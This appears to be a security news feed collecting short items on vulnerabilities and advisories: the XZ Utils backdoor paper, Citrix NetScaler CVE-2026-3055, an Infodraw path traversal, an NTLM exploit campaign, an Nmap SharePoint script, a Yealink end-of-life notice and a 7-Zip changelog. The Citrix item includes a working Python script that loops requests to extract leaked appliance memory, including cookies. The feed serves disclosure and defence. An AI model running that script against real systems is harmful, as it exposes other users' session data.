Recent comments
Wolves in the Repository: A Software Engineering Analysis of the XZ Utils Supply Chain Attack
2026-06-02T04:35:59+0000 by sync_user
https://arxiv.org/abs/2504.17473
The digital economy runs on Open Source Software (OSS), with an estimated 90% of modern applications containing open-source components. While this widespread adoption has revolutionized software development, it has also created critical security vulnerabilities, particularly in essential but under-resourced projects. This paper examines a sophisticated attack on the XZ Utils project (CVE-2024-3094), where attackers exploited not just code, but the entire open-source development process to inject a backdoor into a fundamental Linux compression library. Our analysis reveals a new breed of supply chain attack that manipulates software engineering practices themselves -- from community management to CI/CD configurations -- to establish legitimacy and maintain long-term control. Through a comprehensive examination of GitHub events and development artifacts, we reconstruct the attack timeline and analyze the evolution of attacker tactics. Our findings demonstrate how attackers leveraged seemingly beneficial contributions to project infrastructure and maintenance to bypass traditional security measures. This work extends beyond traditional security analysis by examining how software engineering practices themselves can be weaponized, offering insights for protecting the open-source ecosystem.
For more details https://security.paloaltonetworks.com/CVE-2026-0300
This article provides the known indicators of compromise (IOCs) associated with malicious software c05d5254 and related activity, and actions to take if IOCs are discovered.
https://my.f5.com/manage/s/article/K000160486
Please, We Beg, Just One Weekend Free Of Appliances (Citrix NetScaler CVE-2026-3055 Memory Overread Part 2)
2026-03-30T06:20:52+0000 by sync_user
For more details -> https://labs.watchtowr.com/please-we-beg-just-one-weekend-free-of-appliances-citrix-netscaler-cve-2026-3055-memory-overread-part-2/
which includes
import base64
import requests
import urllib3
urllib3.disable_warnings()
BANNER = """ __ ___ ___________
__ _ ______ _/ |__ ____ | |_\\__ ____\\____ _ ________
\\ \\/ \\/ \\__ \\ ___/ ___\\| | \\| | / _ \\ \\/ \\/ \\_ __ \\
\\ / / __ \\| | \\ \\___| Y | |( <_> \\ / | | \\/
\\/\\_/ (____ |__| \\___ |___|__|__ | \\__ / \\/\\_/ |__|
\\/ \\/ \\/
watchTowr-vs-Citrix-NetScaler-CVE-2026-3055.py
(*) Citrix NetScaler Memory Overread Detection Artifact Generator - Aliz Hammond of watchTowr (@watchTowrcyber)
CVEs: [CVE-2026-3055]
"""
print(BANNER)
while True:
    try:
        # Request the WS-Federation endpoint without verifying the appliance certificate
        # and without following redirects, so the Set-Cookie header is read directly.
        resp = requests.get("https://<host>/wsfed/passive?wctx", verify=False, allow_redirects=False)
        tass = resp.cookies.get('NSC_TASS', None)
        if tass is None:
            continue
        # NSC_TASS is base64-encoded; keep whatever follows the echoed "wctx=" value.
        tassText = base64.b64decode(tass)
        memIdx = tassText.find(b'wctx=')
        if memIdx != -1:
            bled = tassText[memIdx+5:]
            # Print from the first "Cookie" marker onwards as the detection artifact.
            cookiePos = bled.find(b'Cookie')
            if cookiePos != -1:
                print(bled[cookiePos:].decode('ascii', errors='ignore'))
    except Exception:
        pass
Command injection vulnerability in FTP-Flask-python. The project no longer seems to be maintained; the last update was on April 28, 2017.
Nmap script to detect a Microsoft SharePoint instance version.
Usage:
$ nmap -p 443 --script ms-sharepoint-version.nse example.com
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-21 17:33 CEST
Nmap scan report for example.com (127.0.0.1)
Host is up (0.030s latency).
PORT STATE SERVICE
443/tcp open https
| ms-sharepoint-version:
| 16.0.10376:
| product: SharePoint Server 2019 SharePoint Server 2019 MUI/language patch
| build: 16.0.10376
|_ release_date: July 2021
Nmap done: 1 IP address (1 host up) scanned in 0.81 seconds
More information: https://github.com/righel/ms-sharepoint-version-nse
Path Traversal Vulnerability in Surveillance Software - Luxembourg and Belgium notified
2025-04-22T12:20:06+0000 by sync_user
Numerous law enforcement agencies worldwide have been affected by a zero-day exploit (path traversal) in reconnaissance software. This apparently also includes body cameras used by special forces, surveillance equipment, and police drones.
The "Media Relay Service (MRS)" (web server) software for reconnaissance devices from the Israeli manufacturer Infodraw is affected by a serious security vulnerability (Path Traversal Vulnerability). Security experts from Mint Secure discovered the vulnerability and initially reported it to the manufacturer and – due to a lack of response – subsequently to operators and CERTs worldwide in order to rule out further risks and responsibly disclose the vulnerability. This blog post describes technical details, cases from various countries, and the approach behind the discovery. Recommendations for affected organizations are also provided.

CVE-2025-24054, NTLM Exploit in the Wild - Checkpoint Research
2025-04-18T12:00:09+0000 by sync_user
- CVE-2025-24054 is a vulnerability related to NTLM hash disclosure via spoofing, which can be exploited using a maliciously crafted .library-ms file. Active exploitation in the wild has been observed since March 19, 2025, potentially allowing attackers to leak NTLM hashes or user passwords and compromise systems. Although Microsoft released a patch on March 11, 2025, threat actors already had over a week to develop and deploy exploits before the vulnerability began to be actively abused.
- Around March 20–21, 2025, a campaign targeted government and private institutions in Poland and Romania. Attackers used malspam to distribute a Dropbox link containing an archive that exploited multiple known vulnerabilities, including CVE-2025-24054, to harvest NTLMv2-SSP hashes.
- Initial reports suggested that exploitation occurred once the .library-ms file was unzipped. However, Microsoft’s patch documentation indicated that the vulnerability could even be triggered with minimal user interaction, such as right-clicking, dragging and dropping, or simply navigating to the folder containing the malicious file. This exploit appears to be a variant of a previously patched vulnerability, CVE-2024-43451, as both share several similarities.
For more details: CVE-2025-24054, NTLM Exploit in the Wild
Yealink informs that the SIP-T46S has been discontinued since 2022-03-31
2025-01-24T10:18:50+0000 by sync_user
Dear Customers,
Yealink hereby informs you that the SIP-T46S has been discontinued since 2022-03-31. After the date, new orders for the product would not be accepted.
After the End-of-Life date, Yealink will not pursue any new feature development on SIP-T46S, but we will follow the industry standard practices regarding software support of the discontinued (EOL) products. Consistent with such standards, Yealink will continue to offer support and after-sale service.
The general policy guidelines are:
(1) For the first year from the End of Life date, Yealink will offer full support, including HW/SW Technical Support, Apply Existing SW Bug Fixes, New Non-Critical SW Bug Fixes, New Critical SW Bug Fixes and New Security Fixes.
(2) For the second year till, and including, the fifth year from the End of Life, Yealink will attempt to provide SW bug fixes. In the EOL support phase, a SW upgrade of the product to a newer existing release will also be seen as a fix to the SW bug. Providing a fix may not be possible in some cases due to the limitation of hardware or software architecture, and Yealink in its sole discretion will determine what fixes, if any, will be provided.
(3) Yealink will not offer any New Features/Enhancements support from the End of Life.
(4) Spares or replacement parts for hardware will be available depending on your local distributors. Please contact your local Yealink distributors for HW Technical Support and HW Repair and Return (subject to inventory availability). The local Yealink distributors will provide you the corresponding HW support in accordance with Yealink Return Materials Authorization (RMA) process.
(5) Since the sixth year from the End of Life, Yealink will not offer any Support.
7-Zip File Manager didn't propagate Zone.Identifier stream for extracted files from nested archives
2025-01-23T07:14:02+0000 by sync_user
24.09 2024-11-29
-------------------------
- The default dictionary size values for LZMA/LZMA2 compression methods were increased:

  dictionary size                      compression level
  v24.08    v24.09    v24.09
            32-bit    64-bit
  8 MB      16 MB     16 MB            -mx4
  16 MB     32 MB     32 MB            -mx5 : Normal
  32 MB     64 MB     64 MB            -mx6
  32 MB     64 MB     128 MB           -mx7 : Maximum
  64 MB     64 MB     256 MB           -mx8
  64 MB     64 MB     256 MB           -mx9 : Ultra

  The default dictionary size values for 32-bit versions of LZMA/LZMA2 don't exceed 64 MB.
- 7-Zip now can calculate the following hash checksums: SHA-512, SHA-384, SHA3-256 and MD5.
- APM and HFS support was improved.
- If an archive update operation uses a temporary archive folder and the archive is moved to the destination folder, 7-Zip shows the progress of moving the archive file, as this operation can take a long time if the archive is large.
- The bug was fixed: 7-Zip File Manager didn't propagate the Zone.Identifier stream for extracted files from nested archives (if there is an open archive inside another open archive).
- Some bugs were fixed.
https://sourceforge.net/p/sevenzip/discussion/45797/thread/b95432c7ac/